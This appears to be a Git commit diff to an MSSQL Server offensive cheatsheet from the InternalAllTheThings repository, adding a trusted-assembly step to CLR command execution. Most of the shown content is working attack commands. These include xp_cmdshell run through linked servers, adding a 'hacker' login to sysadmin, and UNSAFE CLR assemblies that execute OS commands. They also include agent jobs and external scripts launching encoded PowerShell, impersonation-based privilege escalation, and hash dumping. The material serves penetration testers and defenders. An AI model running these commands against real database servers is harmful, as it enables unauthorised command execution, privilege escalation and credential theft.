swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #4 from sokaRepo/main 

MSSQL assembly trust + typo fixing
pull/5/head
Swissky 2024-01-22 10:52:38 +01:00 committed by GitHub
parent 7edc9c028b ee96d73faf
commit 9fe778c0b7
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 113 additions and 65 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

176
docs/cheatsheets/mssql-server-cheatsheet.md
View File

@ -2,69 +2,72 @@
## Summary ## Summary
* [Tools](#tools) - [MSSQL Server](#mssql-server)
* [Identify Instances and Databases](#identifiy-instaces-and-databases) - [Summary](#summary)
* [Discover Local SQL Server Instances](#discover-local-sql-server-instances) - [Tools](#tools)
* [Discover Domain SQL Server Instances](#discover-domain-sql-server-instances) - [Identify Instances and Databases](#identify-instances-and-databases)
* [Discover Remote SQL Server Instances](#discover-remote-sql-instances) - [Discover Local SQL Server Instances](#discover-local-sql-server-instances)
* [Identify Encrypted databases](#identifiy-encrypted-databases) - [Discover Domain SQL Server Instances](#discover-domain-sql-server-instances)
* [Version Query](#version-query) - [Discover Remote SQL Server Instances](#discover-remote-sql-server-instances)
* [Identify Sensitive Information](#identify-sensitive-information) - [Identify Encrypted databases](#identify-encrypted-databases)
* [Get Tables from a Specific Database](#get-tables-from-specific-databases) - [Version Query](#version-query)
* [Gather 5 Entries from Each Column](#gather-5-entries-from-each-column) - [Identify Sensitive Information](#identify-sensitive-information)
* [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table) - [Get Tables from a Specific Database](#get-tables-from-a-specific-database)
* [Dump common information from server to files](#dump-common-information-from-server-to-files) - [Gather 5 Entries from Each Column](#gather-5-entries-from-each-column)
* [Linked Database](#linked-database) - [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table)
* [Find Trusted Link](#find-trusted-link) - [Dump common information from server to files](#dump-common-information-from-server-to-files)
* [Execute Query Through The Link](#execute-query-through-the-link) - [Linked Database](#linked-database)
* [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) - [Find Trusted Link](#find-trusted-link)
* [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance) - [Execute Query Through The Link](#execute-query-through-the-link)
* [Query Version of Linked Database](#query-version-of-linked-database) - [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain)
* [Execute Procedure on Linked Database](#execute-procedure-on-linked-database) - [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance)
* [Determine Names of Linked Databases ](#determine-names-of-linked-databases) - [Query Version of Linked Database](#query-version-of-linked-database)
* [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database) - [Execute Procedure on Linked Database](#execute-procedure-on-linked-database)
* [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table) - [Determine Names of Linked Databases](#determine-names-of-linked-databases)
* [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column) - [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database)
* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) - [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table)
* [Extended Stored Procedure](#extended-stored-procedure) - [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column)
* [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures) - [Command Execution via xp\_cmdshell](#command-execution-via-xp_cmdshell)
* [CLR Assemblies](#clr-assemblies) - [Extended Stored Procedure](#extended-stored-procedure)
* [Execute commands using CLR assembly](#execute-commands-using-clr-assembly) - [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
* [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it) - [CLR Assemblies](#clr-assemblies)
* [OLE Automation](#ole-automation) - [Execute commands using CLR assembly](#execute-commands-using-clr-assembly)
* [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures) - [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it)
* [Agent Jobs](#agent-jobs) - [OLE Automation](#ole-automation)
* [Execute commands through SQL Agent Job service](#execute-commands-through-sql-agent-job-service) - [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures)
* [List All Jobs](#list-all-jobs) - [Agent Jobs](#agent-jobs)
* [External Scripts](#external-scripts) - [Execute commands through SQL Agent Job service](#execute-commands-through-sql-agent-job-service)
* [Python](#python) - [List All Jobs](#list-all-jobs)
* [R](#r) - [External Scripts](#external-scripts)
* [Audit Checks](#audit-checks) - [Python](#python)
* [Find and exploit impersonation opportunities](#find-and-exploit-impersonation-opportunities) - [R](#r)
* [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy) - [Audit Checks](#audit-checks)
* [Manual SQL Server Queries](#manual-sql-server-queries) - [Find and exploit impersonation opportunities](#find-and-exploit-impersonation-opportunities)
* [Query Current User & determine if the user is a sysadmin](#query-current-user--determine-if-the-user-is-a-sysadmin) - [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy)
* [Current Role](#current-role) - [Manual SQL Server Queries](#manual-sql-server-queries)
* [Current DB](#current-db) - [Query Current User \& determine if the user is a sysadmin](#query-current-user--determine-if-the-user-is-a-sysadmin)
* [List all tables](#list-all-tables) - [Current Role](#current-role)
* [List all databases](#list-all-databases) - [Current DB](#current-db)
* [All Logins on Server](#all-logins-on-server) - [List all tables](#list-all-tables)
* [All Database Users for a Database](#all-database-users-for-a-database) - [List all databases](#list-all-databases)
* [List All Sysadmins](#list-all-sysadmins) - [All Logins on Server](#all-logins-on-server)
* [List All Database Roles](#list-all-database-role) - [All Database Users for a Database](#all-database-users-for-a-database)
* [Effective Permissions from the Server](#effective-permissions-from-the-server) - [List All Sysadmins](#list-all-sysadmins)
* [Effective Permissions from the Database](#effective-permissions-from-the-database) - [List All Database Roles](#list-all-database-roles)
* [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database) - [Effective Permissions from the Server](#effective-permissions-from-the-server)
* [Exploiting Impersonation](#exploiting-impersonation) - [Effective Permissions from the Database](#effective-permissions-from-the-database)
* [Exploiting Nested Impersonation](#exploiting-nested-impersonation) - [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
* [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes) - [Exploiting Impersonation](#exploiting-impersonation)
* [References](#references) - [Exploiting Nested Impersonation](#exploiting-nested-impersonation)
- [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes)
- [References](#references)
## Tools ## Tools
* [NetSPI/PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) - A PowerShell Toolkit for Attacking SQL Server * [NetSPI/PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) - A PowerShell Toolkit for Attacking SQL Server
* [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon/) - A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation. * [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon/) - A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation.
## Identify Instances and Databases ## Identify Instances and Databases
### Discover Local SQL Server Instances ### Discover Local SQL Server Instances
@ -73,6 +76,7 @@
Get-SQLInstanceLocal Get-SQLInstanceLocal
``` ```
### Discover Domain SQL Server Instances ### Discover Domain SQL Server Instances
```ps1 ```ps1
@ -140,10 +144,12 @@ Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv
### Find Trusted Link ### Find Trusted Link
```sql ```sql
select * from master..sysservers select * from master..sysservers
``` ```
### Execute Query Through The Link ### Execute Query Through The Link
```sql ```sql
@ -164,6 +170,7 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
``` ```
### Crawl Links for Instances in the Domain ### Crawl Links for Instances in the Domain
A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
@ -172,6 +179,7 @@ Get-SQLInstanceDomain | Get-SQLServerLink -Verbose
select * from master..sysservers select * from master..sysservers
``` ```
### Crawl Links for a Specific Instance ### Crawl Links for a Specific Instance
```ps1 ```ps1
@ -179,13 +187,14 @@ Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
select * from openquery("<instance>",'select * from openquery("<instance2>",''select * from master..sysservers'')') select * from openquery("<instance>",'select * from openquery("<instance2>",''select * from master..sysservers'')')
``` ```
### Query Version of Linked Database
### Query Version of Linked Database
```ps1 ```ps1
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DBSERVERNAME\DBInstance>`",'select @@version')" -Verbose Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DBSERVERNAME\DBInstance>`",'select @@version')" -Verbose
``` ```
### Execute Procedure on Linked Database ### Execute Procedure on Linked Database
```ps1 ```ps1
@ -196,6 +205,7 @@ SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local"; SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local";
``` ```
### Determine Names of Linked Databases ### Determine Names of Linked Databases
> tempdb, model ,and msdb are default databases usually not worth looking into. Master is also default but may have something and anything else is custom and definitely worth digging into. The result is DatabaseName which feeds into following query. > tempdb, model ,and msdb are default databases usually not worth looking into. Master is also default but may have something and anything else is custom and definitely worth digging into. The result is DatabaseName which feeds into following query.
@ -204,6 +214,7 @@ SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local";
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from sys.databases')" -Verbose Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from sys.databases')" -Verbose
``` ```
### Determine All the Tables Names from a Selected Linked Database ### Determine All the Tables Names from a Selected Linked Database
> The result is TableName which feeds into following query > The result is TableName which feeds into following query
@ -213,6 +224,7 @@ Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openque
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from <DatabaseNameFromPreviousCommand>.sys.tables')" -Verbose Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from <DatabaseNameFromPreviousCommand>.sys.tables')" -Verbose
``` ```
### Gather the Top 5 Columns from a Selected Linked Table ### Gather the Top 5 Columns from a Selected Linked Table
> The results are ColumnName and ColumnValue which feed into following query > The results are ColumnName and ColumnValue which feed into following query
@ -287,15 +299,18 @@ Get-SQLStoredProcedureXP -Instance "<DBSERVERNAME\DBInstance>" -Verbose
sp_dropextendedproc 'xp_calc' sp_dropextendedproc 'xp_calc'
``` ```
## CLR Assemblies ## CLR Assemblies
Prerequisites: Prerequisites:
* sysadmin privileges * sysadmin privileges
* CREATE ASSEMBLY permission (or) * CREATE ASSEMBLY permission (or)
* ALTER ASSEMBLY permission (or) * ALTER ASSEMBLY permission (or)
The execution takes place with privileges of the **service account**. The execution takes place with privileges of the **service account**.
### Execute commands using CLR assembly ### Execute commands using CLR assembly
```ps1 ```ps1
@ -311,6 +326,7 @@ Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\
Get-SQLStoredProcedureCLR -Instance <instance> -Verbose Get-SQLStoredProcedureCLR -Instance <instance> -Verbose
``` ```
### Manually creating a CLR DLL and importing it ### Manually creating a CLR DLL and importing it
Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs` Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs`
@ -372,18 +388,22 @@ Then follow these instructions:
RECONFIGURE RECONFIGURE
GO GO
``` ```
3. Import the assembly 3. Trust the assembly by adding its SHA512 hash
```sql
EXEC sys.sp_add_trusted_assembly 0x[SHA512], N'assembly';
```
4. Import the assembly
```sql ```sql
CREATE ASSEMBLY my_assembly CREATE ASSEMBLY my_assembly
FROM 'c:\temp\cmd_exec.dll' FROM 'c:\temp\cmd_exec.dll'
WITH PERMISSION_SET = UNSAFE; WITH PERMISSION_SET = UNSAFE;
``` ```
4. Link the assembly to a stored procedure 5. Link the assembly to a stored procedure
```sql ```sql
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec]; CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
GO GO
``` ```
5. Execute and clean 6. Execute and clean
```sql ```sql
cmd_exec "whoami" cmd_exec "whoami"
DROP PROCEDURE cmd_exec DROP PROCEDURE cmd_exec
@ -399,11 +419,13 @@ WITH PERMISSION_SET = UNSAFE
GO GO
``` ```
## OLE Automation ## OLE Automation
* :warning: Disabled by default * :warning: Disabled by default
* The execution takes place with privileges of the **service account**. * The execution takes place with privileges of the **service account**.
### Execute commands using OLE automation procedures ### Execute commands using OLE automation procedures
```ps1 ```ps1
@ -439,6 +461,8 @@ SQL> upload reciclador.dll C:\windows\temp\reciclador.dll
* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured. * The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured.
* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job. * :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job.
### Execute commands through SQL Agent Job service ### Execute commands through SQL Agent Job service
```ps1 ```ps1
@ -461,6 +485,7 @@ EXEC dbo.sp_start_job N'test_powershell_job1';
EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1'; EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1';
``` ```
### List All Jobs ### List All Jobs
```ps1 ```ps1
@ -469,16 +494,21 @@ SELECT job.job_id, notify_level_email, name, enabled, description, step_name, co
Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password1234 -Verbose Get-SQLAgentJob -Instance "<DBSERVERNAME\DBInstance>" -username sa -Password Password1234 -Verbose
``` ```
## External Scripts ## External Scripts
:warning: You need to enable **external scripts**. Requirements:
* Feature 'Advanced Analytics Extensions' must be installed
* Enable **external scripts**.
```sql ```sql
sp_configure 'external scripts enabled', 1; sp_configure 'external scripts enabled', 1;
RECONFIGURE; RECONFIGURE;
``` ```
## Python:
### Python
```ps1 ```ps1
Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
@ -487,7 +517,8 @@ EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess
WITH RESULT SETS (([cmd_out] nvarchar(max))) WITH RESULT SETS (([cmd_out] nvarchar(max)))
``` ```
## R
### R
```ps1 ```ps1
Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
@ -499,6 +530,7 @@ GO
@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))' @script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'
``` ```
## Audit Checks ## Audit Checks
@ -519,6 +551,7 @@ Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instanc
powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS LOGIN = 'sa'; SELECT IS_SRVROLEMEMBER(''sysadmin'')" -Verbose -Debug powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS LOGIN = 'sa'; SELECT IS_SRVROLEMEMBER(''sysadmin'')" -Verbose -Debug
``` ```
## Find databases that have been configured as trustworthy ## Find databases that have been configured as trustworthy
```sql ```sql
@ -535,6 +568,7 @@ Invoke-SQLUncPathInjection
Invoke-SQLAuditPrivXpFileexist Invoke-SQLAuditPrivXpFileexist
``` ```
## Manual SQL Server Queries ## Manual SQL Server Queries
### Query Current User & determine if the user is a sysadmin ### Query Current User & determine if the user is a sysadmin
@ -545,48 +579,56 @@ Select system_user
select is_srvrolemember('sysadmin') select is_srvrolemember('sysadmin')
``` ```
### Current Role ### Current Role
```sql ```sql
Select user Select user
``` ```
### Current DB ### Current DB
```sql ```sql
select db_name() select db_name()
``` ```
### List all tables ### List all tables
```sql ```sql
select table_name from information_schema.tables select table_name from information_schema.tables
``` ```
### List all databases ### List all databases
```sql ```sql
select name from master..sysdatabases select name from master..sysdatabases
``` ```
### All Logins on Server ### All Logins on Server
```sql ```sql
Select * from sys.server_principals where type_desc != 'SERVER_ROLE' Select * from sys.server_principals where type_desc != 'SERVER_ROLE'
``` ```
### All Database Users for a Database ### All Database Users for a Database
```sql ```sql
Select * from sys.database_principals where type_desc != 'database_role'; Select * from sys.database_principals where type_desc != 'database_role';
``` ```
### List All Sysadmins ### List All Sysadmins
```sql ```sql
SELECT name,type_desc,is_disabled FROM sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1 SELECT name,type_desc,is_disabled FROM sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1
``` ```
### List All Database Roles ### List All Database Roles
```sql ```sql
@ -601,18 +643,21 @@ WHERE DB1.type = 'R'
ORDER BY DB1.name; ORDER BY DB1.name;
``` ```
### Effective Permissions from the Server ### Effective Permissions from the Server
```sql ```sql
select * from fn_my_permissions(null, 'server'); select * from fn_my_permissions(null, 'server');
``` ```
### Effective Permissions from the Database ### Effective Permissions from the Database
```sql ```sql
SELECT * FROM fn_dp1my_permissions(NULL, 'DATABASE'); SELECT * FROM fn_dp1my_permissions(NULL, 'DATABASE');
``` ```
### Find SQL Server Logins Which can be Impersonated for the Current Database ### Find SQL Server Logins Which can be Impersonated for the Current Database
```sql ```sql
@ -623,6 +668,7 @@ on a.grantor_principal_id = b.principal_id
where a.permission_name = 'impersonate' where a.permission_name = 'impersonate'
``` ```
### Exploiting Impersonation ### Exploiting Impersonation
```sql ```sql
@ -634,6 +680,7 @@ SELECT IS_SRVROLEMEMBER('sysadmin')
SELECT ORIGINAL_LOGIN() SELECT ORIGINAL_LOGIN()
``` ```
### Exploiting Nested Impersonation ### Exploiting Nested Impersonation
```sql ```sql
@ -647,6 +694,7 @@ SELECT ORIGINAL_LOGIN()
SELECT SYSTEM_USER SELECT SYSTEM_USER
``` ```
### MSSQL Accounts and Hashes ### MSSQL Accounts and Hashes
```sql ```sql